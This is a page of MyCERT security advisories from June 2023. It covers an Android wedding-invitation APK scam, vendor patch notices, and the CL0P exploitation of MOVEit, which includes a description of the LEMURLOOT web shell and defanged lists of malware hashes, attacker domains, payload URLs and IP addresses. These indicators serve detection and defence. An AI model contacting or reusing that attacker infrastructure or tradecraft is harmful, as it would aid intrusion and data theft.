Advisories

MA-950.062023: MyCERT Alert - Wedding Invitation "Jemputan Majlis Perkahwinan" Malicious APK

  • 28 Jun 2023
  • Alert
  • jemputan, kad, invitation, apk, scam, sms, wedding

1.0 Introduction

Recently, MyCERT observed cybercriminals had exploited a malicious android application in a "Wedding Invitation" or “Jemputan Majlis Perkahwinan” malware campaign targeting internet users in Malaysia. The Wedding Invitation Scam preys on people's excitement about wedding invitations. Cybercriminals use text messages sent via instant messaging apps such as WhatsApp to trick victims into installing a malicious APK on their devices that can steal their personal information.

2.0 Impact
Financial loss and disclosure of personal information. An APK is a file format used by the Android operating system for the distribution and installation of mobile apps, usually via Google Play Store. The APK files allow the perpetrators to steal data from users' mobile phones, including users' TAC numbers which enables them to make unauthorised banking transactions from victims' bank accounts.

3.0 Affected System and Devices
Android mobile devices.

4.0 Other related alerts and advisories
Below are references of similar incidents:

5.0 Recommendations
The application is meant to retrieve information from the victim’s phone and could be used for other malicious purposes. As a CERT, we would highly recommend the followings:

• Verify application permission and the application author or publisher before installing it.
• Avoid side loading (installing from non-official sources) when you can. If you do need to install Android software from a source other than the trusted marketplace, be sure that it is coming from a reputable source.
• Do not click on adware or suspicious URL sent through SMS/messaging services.
• Malicious programs could be attached to collect users' information.
• Always run a reputable anti-virus on your smartphone/mobile devices, and keep it up to date regularly.
• Update the operating system and applications on smartphone/tablet, including the browser, in order to avoid any malicious exploits of security holes in out-dates versions.
• Do not root or 'Jailbreak' your phone.
• Contact relevant authorities and report to the National Scam Response Centre at 997 for any inquiries and assistance related to this threat.

Generally, MyCERT advises the users of these devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, don't hesitate to get in touch with MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours)  
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

6.0    References

Read More

MA-949.062023: MyCERT Advisory - CISA Releases Four Industrial Control Systems Advisories

  • 28 Jun 2023
  • Advisory
  • ics, security, update, industrial, control, systems

1.0 Introduction

Recently, CISA released four Industrial Control Systems (ICS) advisories on June 22, 2023.

2.0 Impact
These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. 

3.0 Affected Products

4.0 Recommendations
MyCERT encourages users and administrators to review the newly released ICS advisories for technical details and mitigations.

Kindly refer to the following URLs:

Generally, MyCERT advises the users of this devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

5.0    References

Read More

MA-948.062023: MyCERT Advisory - ISC Releases Security Advisories for Multiple Versions of BIND 9

  • 28 Jun 2023
  • Advisory
  • ISC, BIND, security, update

1.0 Introduction

Recently, The Internet Systems Consortium (ISC) has released security advisories that address vulnerabilities affecting multiple versions of the ISC’s Berkeley Internet Name Domain (BIND) 9.

2.0 Impact
A remote attacker could exploit these vulnerabilities to potentially cause denial-of-service conditions.

3.0 Affected Products
Multiple versions of the ISC’s Berkeley Internet Name Domain (BIND) 9

4.0 Recommendations
MyCERT encourages users and administrators to review the following ISC advisories CVE-2023-2828, CVE-2023-2829, and CVE-2023-2911 and apply the necessary mitigations.

Kindly refer to the following URLs:

Generally, MyCERT advises the users of this devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

5.0    References

Read More

MA-947.062023: MyCERT Advisory - Apple Releases Security Updates for Multiple Products

  • 27 Jun 2023
  • Advisory
  • apple, iOS, iPadOS, macOS, watchOS, update, security

1.0 Introduction

Recently, Apple has released security updates to address vulnerabilities in multiple products.

2.0 Impact
An attacker could exploit some of these vulnerabilities to take control of an affected device:

  • CVE-2023-32434: An integer overflow vulnerability in the Kernel that could be exploited by a malicious app to execute arbitrary code with kernel privileges.
  • CVE-2023-32435: A memory corruption vulnerability in WebKit that could lead to arbitrary code execution when processing specially crafted web content.

3.0 Affected Products

4.0 Recommendations
MyCERT encourages users and administrators to review the following advisories and apply the necessary updates.

Kindly refer to the following URLs:

Generally, MyCERT advises the users of this devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

To update, please refer:

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

5.0    References

Read More

MA-943.062023: MyCERT Advisory - Multiple MOVEit Transfer Vulnerabilities

  • 19 Jun 2023
  • Advisory
  • MOVEit, vulnerability, managed file transfer

1.0 Introduction

Recently, Progress has discovered a vulnerability in MOVEit Transfer that could lead to escalated privileges and potential unauthorized access to the environment. If you are a MOVEit Transfer customer, it is extremely important that you take immediate action as noted below in order to help protect your MOVEit Transfer environment. In Progress MOVEit Transfer versions released before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), 2023.0.3 (15.0.3), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an un-authenticated attacker to gain unauthorized access to the MOVEit Transfer database.

2.0 Impact
A cyber threat actor could exploit this vulnerability to take over an affected system. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint which could result in modification and disclosure of MOVEit database content.

3.0 Affected Products
All MOVEit Transfer versions are affected by this vulnerability.
Based on our review of this situation to date, the following products are not susceptible to this SQL Injection Vulnerability in MOVEit Transfer: MOVEit Automation, MOVEit Client, MOVEit Add-in for Microsoft Outlook, MOVEit Mobile, WS_FTP Client, WS_FTP Server, MOVEit EZ, MOVEit Gateway, MOVEit Analytics, and MOVEit Freely. At this time, no action is necessary for the above-mentioned products.

4.0 Recommendations
NOTICE: All MOVEit Transfer customers must take action and apply the patch to address the June 15th CVE-2023-35708 vulnerability discovered in MOVEit Transfer. There are two paths to take depending on if you have applied the remediation and patching steps from the MOVEit Transfer Critical Vulnerability (May 2023) article prior to June 15.

  • Have NOT applied May 2023 patch: Follow all the remediation steps and patching in the following article: MOVEit Transfer Critical Vulnerability (May 2023) . That article contains the latest patches, which includes the fix for the June 9 (CVE-2023-35036) vulnerability as well as the original vulnerability from May 31 (CVE-2023-34362). 
    After you have done the above, proceed to the Immediate Mitigation Steps below. 
  • Have applied May 2023 (CVE-2023-34362) patch and followed the remediation steps: Proceed to the Immediate Mitigation Steps and apply the June 15 patch (CVE Pending) as outlined below. You will then be up to date for the vulnerabilities announced on May 31 (CVE-2023-34362), June 9 (CVE-2023-35036) and June 15 (CVE Pending). 
  • Have applied May 2023 (CVE-2023-34362) patch, followed the remediation steps and applied the June 9 (CVE-2023-35036) patch: Proceed to the Immediate Mitigation Steps and apply the June 15 patch (CVE-2023-35708) as outlined below. You will then be up to date for the vulnerabilities announced on May 31 (CVE-2023-34362), June 9 (CVE-2023-35036) and June 15 (CVE-2023-35708). 

5.0 Immediate Mitigation Steps
To help prevent unauthorized access to your MOVEit Transfer environment, we strongly recommend that you immediately apply the following mitigation measures until you are able to apply the June 15th patch (CVE-2023-35708).

1. Disable all HTTP and HTTPs traffic to your MOVEit Transfer environment. More specifically:

  • Modify firewall rules to deny HTTP and HTTPs traffic to MOVEit Transfer on ports 80 and 443. 
  • It is important to note that until HTTP and HTTPS traffic is enabled again: 
    • Users will not be able to log on to the MOVEit Transfer web UI 
    • MOVEit Automation tasks that use the native MOVEit Transfer host will not work
    • REST, Java and .NET APIs will not work
    • MOVEit Transfer add-in for Outlook will not work
  • SFTP and FTP/s protocols will continue to work as normal

2. As a workaround, administrators will still be able to access MOVEit Transfer by using a remote desktop to access the Windows machine and then accessing https://localhost/. For more information on localhost connections, please refer to MOVEit Transfer Help: https://docs.progress.com/bundle/moveit-transfer-web-admin-help-2023/page/Security-Policies-Remote-Access_2.html 

3. Apply the Patch 
As patches for supported MOVEit Transfer versions become available, links will be provided below. Supported versions are listed at the following link: https://community.progress.com/s/products/moveit/product-lifecycle. Please note, the license file can remain the same when staying on a major release to apply the patch. 

4. Enable all HTTP and HTTPs traffic to your MOVEit Transfer environment 

5. Please bookmark the Progress Security Page and refer to it to ensure you have all of the latest updates. 

 

DLL Drop-In (for customers who have one of the required versions listed installed)

IMPORTANT: Please read the README.txt before attempting the DLL Drop-in Install. Do not leave old versions of these DLL files on the system. They must be completely removed, not just renamed. 

Required Version for DLL Drop-InFixed Version (DLL drop-in)Documentation
MOVEit Transfer 2023.0.1, 2023.0.2 (15.0.1, 15.0.2)MOVEit Transfer 2023.0.3 (15.0.3)Download the patch at the link 
in the Fixed Version column and 
see the readme.txt file in the zip 
file for instructions
MOVEit Transfer 2022.1.5, 2022.1.6 (14.1.5, 14.1.6)MOVEit Transfer 2022.1.7 (14.1.7)Download the patch at the link 
in the Fixed Version column and 
see the readme.txt file in the zip 
file for instructions
MOVEit Transfer 2022.0.4, 2022.0.5 (14.0.4, 14.0.5)MOVEit Transfer 2022.0.6 (14.0.6)
MOVEit Transfer 2021.1.4, 2021.1.5 (13.1.4, 13.1.5)MOVEit Transfer 2021.1.6 (13.1.6)Download the patch at the link 
in the Fixed Version column and 
see the readme.txt file in the zip 
file for instructions
MOVEit Transfer 2021.0.6, 2021.0.7 (13.0.6, 13.0.7)MOVEit Transfer 2021.0.8 (13.0.8)
MOVEit Transfer 2020.1.6 (12.1.6) or laterMOVEit Transfer 2020.1.10 (12.1.10)Download the patch at the link 
in the Fixed Version column and 
see the readme.txt file in the zip 
file for instructions
MOVEit Transfer 2020.0.x (12.0) or olderMUST upgrade to a supported versionSee MOVEit Transfer Upgrade 
and Migration Guide

Full Installer

Affected VersionFixed Version (full installer)Documentation
MOVEit Transfer 2023.0.x (15.0.x)MOVEit Transfer 2023.03 (15.0.3)MOVEit 2023 Upgrade Documentation
MOVEit Transfer 2022.1.x (14.1.x)

MOVEit Transfer 2022.1.7 (14.1.7)

 

MOVEit 2022 Upgrade Documentation
MOVEit Transfer 2022.0.x (14.0.x)

MOVEit Transfer 2022.0.6 (14.0.6)

 

MOVEit Transfer 2021.1.x (13.1.x)

MOVEit Transfer 2021.1.6 (13.1.6)

 

MOVEit 2021 Upgrade Documentation
MOVEit Transfer 2021.0.x (13.0.x)

MOVEit Transfer 2021.0.8 (13.0.8)

 

MOVEit Transfer 2020.1.x (12.1)Must update to at least 2020.1.6 then apply DLL Drop-ins aboveSee KB?Vulnerability (May 2023) Fix for MOVEit Transfer 2020.1 (12.1)  
MOVEit Transfer 2020.0.x (12.0) or olderMUST upgrade to a supported versionSee MOVEit Transfer Upgrade and 
Migration Guide
MOVEit Cloud

Prod: 14.1.6.97 or 14.0.5.45

Test: 15.0.2.39

All MOVEit Cloud systems are fully 
patched at this time.

Cloud Status Page

 

MyCERT urges users and organizations to review the MOVEit Transfer Advisory, follow the mitigation steps, apply the necessary updates, and hunt for any malicious activity.

Kindly refer to the following URL: https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023

Generally, MyCERT advises the users of this devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

6.0    References

Read More

MA-946.062023: MyCERT Advisory - Microsoft's Monthly (June 2023) consolidated tech and security patches update

  • 19 Jun 2023
  • Advisory
  • microsoft, update, security

1.0 Introduction

Recently, Microsoft has released updates to address multiple vulnerabilities in Microsoft software.

2.0 Impact
An attacker can exploit some of these vulnerabilities to take control of an affected system.

3.0 Affected Products
Multiple Microsoft software and products

4.0 Recommendations
MyCERT encourages users and administrators to review Microsoft’s June 2023 Security Update Guide and Deployment Information and apply the necessary updates.

Kindly refer to the following URLs:

Generally, MyCERT advises the users of this devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

5.0    References

Read More

MA-945.062023: MyCERT Advisory - Mozilla Releases Security Updates for Multiple Products

  • 19 Jun 2023
  • Advisory
  • mozilla, firefox, update

1.0 Introduction

Recently, Mozilla has released security updates to address vulnerabilities for Firefox 114 and Firefox ESR 102.12.

2.0 Impact
An attacker could exploit these vulnerabilities to take control of an affected system.

3.0 Affected Products
Firefox 114 and Firefox ESR 102.12.

4.0 Recommendations
MyCERT encourages users and administrators to review Mozilla’s security advisories for Firefox 114 and Firefox ESR 102.12 for more information and apply the necessary updates.

Kindly refer to the following URLs for more information:

Generally, MyCERT advises the users of this devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

5.0    References

Read More

MA-944.062023: MyCERT Advisory - CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability

  • 15 Jun 2023
  • Advisory
  • cl0p, ransomware, moveit, vulnerability

1.0 Introduction

Open-source data indicates that on May 27, 2023, the CL0P Ransomware Gang, also known as TA505, started exploiting a previously unreported SQL injection vulnerability (CVE-2023-34362) in Progress Software’s managed file transfer (MFT), MOVEit Transfer. 

A web shell called LEMURLOOT was used to infect MOVEit Transfer web apps that were accessible to the public and steal data from the underlying MOVEit Transfer databases. Similar flurry of activity was launched by TA505 in early 2023 targeting Fortra/Linoma GoAnywhere MFT servers and Accellion File Transfer Appliance (FTA) devices in the form of zero-day exploit-driven attacks.

 

2.0 Impact

  • Retrieve Microsoft Azure system settings and enumerate the underlying SQL database.
  • Store a string sent by the operator and then retrieve a file with a name matching the string from the MOVEit Transfer system.
  • Create a new administrator privileged account with a randomly generated username and LoginName and RealName values set to “Health Check Service.”
  • Delete an account with LoginName and RealName values set to ‘Health Check Service.’

 

3.0 Affected Products

  • MOVEit Transfer 2023.0.0
  • MOVEit Transfer 2022.1.x
  • MOVEit Transfer 2022.0.x
  • MOVEit Transfer 2021.1.x
  • MOVEit Transfer 2021.0.x
  • MOVEit Transfer 2020.1.x
  • MOVEit Transfer 2020.0.x

 

4.0 Indicators of Compromise (IoCs)
4.1 Moveit Campaign Indicators of Compromised

FilesHash

LEMURLOOT

Web Shell

e.g. human2.aspx

 0b3220b11698b1436d1d866ac07cc90018e59884e91a8cb71ef8924309f1e0e9 
0ea05169d111415903a1098110c34cdbbd390c23016cd4e179dd9ef507104495 
110e301d3b5019177728010202c8096824829c0b11bb0dc0bff55547ead18286 
1826268249e1ea58275328102a5a8d158d36b4fd312009e4a2526f0bfbc30de2 
2413b5d0750c23b07999ec33a5b4930be224b661aaf290a0118db803f31acbc5 
2ccf7e42afd3f6bf845865c74b2e01e2046e541bb633d037b05bd1cdb296fa59 
348e435196dd795e1ec31169bd111c7ec964e5a6ab525a562b17f10de0ab031d 
387cee566aedbafa8c114ed1c6b98d8b9b65e9f178cf2f6ae2f5ac441082747a 
38e69f4a6d2e81f28ed2dc6df0daf31e73ea365bd2cfc90ebc31441404cca264 
3a977446ed70b02864ef8cfa3135d8b134c93ef868a4cc0aa5d3c2a74545725b 
3ab73ea9aebf271e5f3ed701286701d0be688bf7ad4fb276cb4fbe35c8af8409 
3c0dbda8a5500367c22ca224919bfc87d725d890756222c8066933286f26494c 
4359aead416b1b2df8ad9e53c497806403a2253b7e13c03317fc08ad3b0b95bf 
48367d94ccb4411f15d7ef9c455c92125f3ad812f2363c4d2e949ce1b615429a 
58ccfb603cdc4d305fddd52b84ad3f58ff554f1af4d7ef164007cb8438976166 
5b566de1aa4b2f79f579cdac6283b33e98fdc8c1cfa6211a787f8156848d67ff 
6015fed13c5510bbb89b0a5302c8b95a5b811982ff6de9930725c4630ec4011d 
702421bcee1785d93271d311f0203da34cc936317e299575b06503945a6ea1e0 
769f77aace5eed4717c7d3142989b53bd5bac9297a6e11b2c588c3989b397e6b 
7c39499dd3b0b283b242f7b7996205a9b3cf8bd5c943ef6766992204d46ec5f1 
93137272f3654d56b9ce63bec2e40dd816c82fb6bad9985bed477f17999a47db 
98a30c7251cf622bd4abce92ab527c3f233b817a57519c2dd2bf8e3d3ccb7db8 
9d1723777de67bc7e11678db800d2a32de3bcd6c40a629cd165e3f7bbace8ead 
9e89d9f045664996067a05610ea2b0ad4f7f502f73d84321fb07861348fdc24a 
a1269294254e958e0e58fc0fe887ebbc4201d5c266557f09c3f37542bd6d53d7 
a8f6c1ccba662a908ef7b0cb3cc59c2d1c9e2cbbe1866937da81c4c616e68986 
b1c299a9fe6076f370178de7b808f36135df16c4e438ef6453a39565ff2ec272 
b5ef11d04604c9145e4fe1bedaeb52f2c2345703d52115a5bf11ea56d7fb6b03 
b9a0baf82feb08e42fa6ca53e9ec379e79fbe8362a7dac6150eb39c2d33d94ad 
bdd4fa8e97e5e6eaaac8d6178f1cf4c324b9c59fc276fd6b368e811b327ccf8b 
c56bcb513248885673645ff1df44d3661a75cfacdce485535da898aa9ba320d4 
c77438e8657518221613fbce451c664a75f05beea2184a3ae67f30ea71d34f37 
cec425b3383890b63f5022054c396f6d510fae436041add935cd6ce42033f621 
cf23ea0d63b4c4c348865cefd70c35727ea8c82ba86d56635e488d816e60ea45 
d477ec94e522b8d741f46b2c00291da05c72d21c359244ccb1c211c12b635899 
d49cf23d83b2743c573ba383bf6f3c28da41ac5f745cde41ef8cd1344528c195 
daaa102d82550f97642887514093c98ccd51735e025995c2cc14718330a856f4 
e8012a15b6f6b404a33f293205b602ece486d01337b8b3ec331cd99ccadb562e 
ea433739fb708f5d25c937925e499c8d2228bf245653ee89a6f3d26a5fd00b7a 
ed0c3e75b7ac2587a5892ca951707b4e0dd9c8b18aaf8590c24720d73aa6b90c 
f0d85b65b9f6942c75271209138ab24a73da29a06bc6cc4faeddcb825058c09d 
fe5f8388ccea7c548d587d1e2843921c038a9f4ddad3cb03f3aa8a45c29c6a2f 

 

4.2 GoAnywhere Campaign Indicators of Compromise

FilesHashDescription
larabqFa.exe Qboxdv.dll

0e3a14638456f4451fe8d76

fdc04e591fba942c2f16da3 1857ca66293a58a4c3

Truebot
%TMP%\7ZipSfx.000\Zoom.exe1285aa7e6ee729be808c46 c069e30a9ee9ce34287151 076ba81a0bea0508ff7eSpawns a PowerShell subprocess which executes a malicious DLL file
%TMP%\7ZipSfx.000\ANetDiag.dll2c8d58f439c708c28ac4ad 4a0e9f93046cf076fc6e5ab 1088e8943c0909acbc4

Obfuscated malware which also uses long sleeps and

debug detection to evade analysis

AVICaptures.dll

a8569c78af187d603eecdc 5faec860458919349eef510

91893b705f466340ecd

Truebot
kpdphhajHbFerUr.exe gamft.dll

c042ad2947caf4449295a5

1f9d640d722b5a6ec69575 23ebf68cddb87ef3545c

Truebot
dnSjujahur.exe Pxaz.dll

c9b874d54c18e895face05 5eeb6faa2da7965a336d70

303d0bd6047bec27a29d

Truebot
7ZSfxMod_x86.exe ZoomInstaller.exe Zoom.exed5bbcaa0c3eeea17f12a5c c3dbcaffff423d00562acb69 4561841bcfe984a3b7Fake Zoom installer - Truebot
update.jsp

eb9f5cbe71f9658d38fb4a7

aa101ad40534c4c93ee73e f5f6886d89159b0e2c2

Java Server Pages (JSP) web

shell with some base64 obfuscation

%TMP%\<folder>\extracted_at_0x e5c8f00.exef2f08e4f108aaffaadc3d11b ad24abdd625a77e0ee9674 c4541b562c78415765

Employs sandbox detection and string obfuscation - appears to be a collection of

C# hack tools

UhfdkUSwkFKedUUi.exe gamft.dllff8c8c8bfba5f2ba2f800325 5949678df209dbff95e16f2f 3c338cfa0fd1b885Truebot

 

Email AddressDescription
unlock@rsv-box[.]comCL0P communication email
unlock@support-mult[.]comCL0P communication email
rey14000707@gmail[.]comLogin/Download
gagnondani225@gmail[.]comEmail

 

Malicious Domain
http://hiperfdhaus[.]com
http://jirostrogud[.]com
http://qweastradoc[.]com
http://qweastradoc[.]com/gate.php
http://connectzoomdownload[.]com/download/ZoomInstaller.exe
https://connectzoomdownload[.]com/download/ZoomInstaller.exe

 

Certificate Name

 

Status

 

Date Valid

 

Thumbprint

Serial Number

 

Savas Investments PTY LTD

Valid Issuer: Sectigo Public Code Signing CA R36

 

10/7/2022 -

10/7/2023

8DCCF6AD21A58226521

00-82-D2-24-

32-3E-FA-65-

06-0B-64- 1F-

51-FA-DF-EF-

02

 

E36D7E5DBAD133331C181

 

MOVEit Campaign Infrastructure IP Addresses

May/June 2023

GoAnywhere Campaign Infrastructure IP Addresses

January/February 2023

104.194.222[.]107100.21.161[.]34
138.197.152[.]201104.200.72[.]149
146.0.77[.]141107.181.161[.]207
146.0.77[.]155141.101.68[.]154
146.0.77[.]183141.101.68[.]166
148.113.152[.]144142.44.212[.]178
162.244.34[.]26143.31.133[.]99
162.244.35[.]6148.113.159[.]146
179.60.150[.]143148.113.159[.]213
185.104.194[.]15615.235.13[.]184
185.104.194[.]2415.235.83[.]73
185.104.194[.]40162.158.129[.]79
185.117.88[.]17166.70.47[.]90
185.162.128[.]75172.71.134[.]76
185.174.100[.]215173.254.236[.]131
185.174.100[.]250185.104.194[.]134
185.181.229[.]240185.117.88[.]2
185.181.229[.]73185.174.100[.]17
185.183.32[.]122185.33.86[.]225
185.185.50[.]172185.33.87[.]126
188.241.58[.]244185.80.52[.]230
193.169.245[.]79185.81.113[.]156
194.33.40[.]103192.42.116[.]191
194.33.40[.]104195.38.8[.]241
194.33.40[.1]64198.137.247[.]10
198.12.76[.]214198.199.74[.]207
198.27.75[.]110198.199.74[.]207:1234/update.jsp
206.221.182[.]106198.245.13[.]4
209.127.116[.]12220.47.120[.]195
209.127.4[.]22208.115.199[.]25
209.222.103[.]170209.222.98[.]25
209.97.137[.]33213.121.182[.]84
45.227.253[.]133216.144.248[.]20
45.227.253[.]14723.237.114[.]154
45.227.253[.]5023.237.56[.]234
45.227.253[.]63.101.53[.]11
45.227.253[.]8244.206.3[.]111
45.56.165[.]24845.182.189[.]200
5.149.248[.]6845.182.189[.]228
5.149.250[.]7445.182.189[.]229
5.149.250[.]925.149.250[.]90
5.188.86[.]1145.149.252[.]51
5.188.86[.]2505.188.206[.]76
5.188.87[.]1945.188.206.76[:]8000/se1.dll
5.188.87[.]2265.34.178[.]27
5.188.87[.]275.34.178[.]28
5.252.23[.]1165.34.178[.]30
5.252.25[.]885.34.178[.]31
5.34.180[.]2055.34.180[.]48
62.112.11[.]5750.7.118[.]90
62.182.82[.]1954.184.187[.]134
62.182.85[.]23454.39.133[.]41
66.85.26[.]21563.143.42[.]242
66.85.26[.]23468.156.159[.]10
66.85.26[.]24874.218.67[.]242
79.141.160[.]7876.117.196[.]3
79.141.160[.]8379.141.160[.]78
84.234.96[.]10479.141.161[.]82
84.234.96[.]3179.141.173[.]94
89.39.104[.]11881.56.49[.]148
89.39.105[.]10882.117.252[.]141
91.202.4[.]7682.117.252[.]142
91.222.174[.]9582.117.252[.]97
91.229.76[.]18788.214.27[.]100
93.190.142[.]13188.214.27[.]101
 91.222.174[.]68
 91.223.227[.]140
 92.118.36[.]210
 92.118.36[.]213
 92.118.36[.]249
 96.10.22[.]178
 96.44.181[.]131
 5.252.23[.]116
 5.252.25[.]88
 84.234.96[.]104
 89.39.105[.]108
 138.197.152[.]201
 148.113.152[.]144
 198.12.76[.]214
 209.97.137[.]33
 209.222.103[.]170

 

5.0 Recommendations
MyCERT recommends users and administrators to follow the security best practices as recommended below to improve their organization’s security posture.

  • Reduce threat of malicious actors using remote access tools by:
    • Auditing remote access tools.
    • Reviewing logs for execution of remote access software.
    • Using security software.
    • Requiring authorized remote access solutions.
    • Blocking both inbound and outbound connections.
  • Implement application controls.
  • Strictly limit the use of RDP and other remote desktop services.
  • Disable command-line and scripting.
  • Restrict the use of PowerShell.
  • Update Windows PowerShell or PowerShell Core.
  • Review domain controllers, servers, workstation, and active directories.
  • Audit user accounts with administrative privileges.
  • Reduce the threat of credential compromise.
  • Implement time-based access for accounts.

In addition, MyCERT recommend apply the following recommendation to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan.
  • Maintain offline backups of data.
  • Require multifactor authentication.
  • Keep all operating systems, software and firmware up to date.
  • Segment networks.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.
  • Install, regularly update, and enable real time detection for antivirus software.
  • Disable unused ports and hyperlinks.
  • Consider adding and email banner to emails.
  • Ensure all backup data is encrypted, immutable.

Generally, MyCERT advises the users of this devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

 

6.0    References

Read More

MA-942.062023: MyCERT Advisory - Fortinet Fixes Critical RCE Flaw in Fortigate SSL-VPN Devices

  • 15 Jun 2023
  • Advisory
  • fortinet, fortiOS, fortigate

1.0 Introduction

Recently, Fortinet has released security updates to address a heap-based buffer overflow vulnerability CVE-2023-27997 in FortiOS and FortiProxy.

2.0 Impact
An attacker could exploit this vulnerability to take control of an affected system.

3.0 Affected Products

  • FortiOS-6K7K version 7.0.10
  • FortiOS-6K7K version 7.0.5
  • FortiOS-6K7K version 6.4.12
  • FortiOS-6K7K version 6.4.10
  • FortiOS-6K7K version 6.4.8
  • FortiOS-6K7K version 6.4.6
  • FortiOS-6K7K version 6.4.2
  • FortiOS-6K7K version 6.2.9 through 6.2.13
  • FortiOS-6K7K version 6.2.6 through 6.2.7
  • FortiOS-6K7K version 6.2.4
  • FortiOS-6K7K version 6.0.12 through 6.0.16
  • FortiOS-6K7K version 6.0.10
  • FortiProxy version 7.2.0 through 7.2.3
  • FortiProxy version 7.0.0 through 7.0.9
  • FortiProxy version 2.0.0 through 2.0.12
  • FortiProxy 1.2 all versions
  • FortiProxy 1.1 all versions
  • FortiOS version 7.2.0 through 7.2.4
  • FortiOS version 7.0.0 through 7.0.11
  • FortiOS version 6.4.0 through 6.4.12
  • FortiOS version 6.2.0 through 6.2.13
  • FortiOS version 6.0.0 through 6.0.16

4.0 Recommendations
MyCERT encourages users and administrators to review Fortinet security advisory FG-IR-23-097 and apply the necessary updates. For more information, see Fortinet's Analysis of CVE-2023-27997 and Clarifications on Volt Typhoon Campaign.

Kindly refer to the URLs below:

Generally, MyCERT advises the users of this devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

5.0    References

Read More

MA-941.062023: MyCERT Advisory - BianLian Ransomware Group

  • 15 Jun 2023
  • Advisory
  • bianlian, ransomware,

1.0 Introduction

Recently, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Cyber Security Centre (ACSC) released a joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations as of March 2023. 

BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development. The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian group actors then extort money by threatening to release data if payment is not made. BianLian group originally employed a double-extortion model in which they encrypted victims’ systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion.

2.0 Technical Details
